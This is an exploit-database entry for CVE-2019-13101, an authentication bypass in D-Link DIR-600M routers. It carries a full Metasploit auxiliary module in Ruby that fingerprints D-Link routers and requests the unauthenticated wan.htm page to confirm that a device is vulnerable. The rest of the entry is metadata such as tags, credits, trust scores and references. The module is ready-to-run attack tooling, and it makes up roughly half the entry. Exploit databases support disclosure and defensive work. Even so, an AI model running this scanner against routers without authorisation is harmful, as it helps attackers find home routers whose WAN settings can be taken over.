ID

VAR-E-201908-0016


CVE

cve_id:CVE-2019-13101

Trust: 1.5

sources: PACKETSTORM: 153994 // EXPLOIT-DB: 47250

EDB ID

47250


TITLE

D-Link DIR-600M - Authentication Bypass (Metasploit) - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 47250

DESCRIPTION

D-Link DIR-600M - Authentication Bypass (Metasploit). CVE-2019-13101 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 47250

AFFECTED PRODUCTS

vendor:d linkmodel:dir-600mscope: - version: -

Trust: 1.6

vendor:d linkmodel:dir-600m wireless n home router accessscope:eqversion:150

Trust: 0.5

sources: PACKETSTORM: 153994 // EXPLOIT-DB: 47250 // EDBNET: 101845

EXPLOIT

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report

def initialize(info = {})
super(update_info(info,
'Name' => 'CVE-2019-13101 D-Link DIR-600M Incorrect Access Control',
'Description' => %q{
This module attempts to find D-Link router DIR-600M which is
vulnerable to Incorrect Access Control. The vulnerability exists in
wan.htm, which is accessible without authentication. This
vulnerabilty can lead an attacker to manipulate WAN settings.
This module has been tested successfully on Firmware Version
3.01,3.02,3.03,3.04,3.05,3.06.
},
'Author' => [ 'Devendra Singh Solanki <devendra0x0[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
'CVE', '2019-13101'
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 08 2019'))

register_options(
[
Opt::RPORT(80)
])
end

def run_host(ip)
res = send_request_cgi({'uri' => '/login.htm'})
if res.nil? or res.code == 404
print_error("#{rhost}:#{rport} - Host is down.")
return
end

if res and res.code == 200 and res.body =~ /D-Link/
print_good("#{rhost}:#{rport} - It is a D-Link router")
else
print_error("#{rhost}:#{rport} - Not a D-Link router")
return
end

res = send_request_cgi({'uri' => '/wan.htm'})

if res and res.code == 200 and res.body =~ /PPPoE/
print_good("#{rhost}:#{rport} - Router is vulnerable for
Incorrect Access Control. CVE-2019-13101")
else
print_error("#{rhost}:#{rport} - Router is with different firmware.")
return
end

end
end

Trust: 1.0

sources: EXPLOIT-DB: 47250

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 47250

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 47250

TYPE

Authentication Bypass (Metasploit)

Trust: 1.6

sources: EXPLOIT-DB: 47250 // EDBNET: 101845

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:Authentication Bypass / Credentials Bypass (AB/CB)

Trust: 1.0

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

sources: PACKETSTORM: 153994 // EXPLOIT-DB: 47250

CREDITS

Devendra Singh Solanki

Trust: 0.6

sources: EXPLOIT-DB: 47250

EXTERNAL IDS

db:EXPLOIT-DBid:47250

Trust: 1.6

db:NVDid:CVE-2019-13101

Trust: 1.5

db:EDBNETid:101845

Trust: 0.6

db:PACKETSTORMid:153994

Trust: 0.5

sources: PACKETSTORM: 153994 // EXPLOIT-DB: 47250 // EDBNET: 101845

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2019-13101

Trust: 1.5

url:https://www.exploit-db.com/exploits/47250/

Trust: 0.6

sources: PACKETSTORM: 153994 // EXPLOIT-DB: 47250 // EDBNET: 101845

SOURCES

db:PACKETSTORMid:153994
db:EXPLOIT-DBid:47250
db:EDBNETid:101845

LAST UPDATE DATE

2022-07-27T09:56:04.297000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:153994date:2019-08-09T20:21:38
db:EXPLOIT-DBid:47250date:2019-08-14T00:00:00
db:EDBNETid:101845date:2019-08-15T00:00:00